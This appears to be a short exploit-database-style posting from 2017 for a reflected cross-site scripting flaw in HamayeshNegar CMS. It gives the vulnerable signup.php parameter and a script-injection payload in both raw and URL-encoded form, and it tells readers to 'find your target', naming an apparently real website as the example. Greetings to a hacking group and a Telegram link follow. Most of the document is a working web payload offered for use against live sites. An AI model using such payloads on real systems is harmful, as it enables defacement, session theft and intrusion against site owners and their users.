##########################
# Exploit Title: HamayeshNegar CMS Cross Site Scripting
# Date: 2017-10-28
# Discovered By: ArashHC
# Tested on : Win10, Win8, Kali Linux
##########################
find your target
Same:
http://manageaccount2017.com
Exploit:
/users/signup.php?utype=user'"><script>alert("Hacked By ArashHC :)")</script>
Like This:
http://manageaccount2017.com/users/signup.php?utype=user%27%22%3E%3Cscript%3Ealert(%22Hacked%20By%20ArashHC%20:)%22)%3C/script%3E
##########################
# Thanks to : EreBus, RexProg, Crazy_Boy, AVENGER, ViRuS007, BlackWolfIran, LM7RIX, AliCyber, </ZED>, Agent W, AnonyCoder, Sarbaz Vatan, unknown0707, FarsProg
# https://t.me/CyberSoldiersST
# Discovered By: ArashHC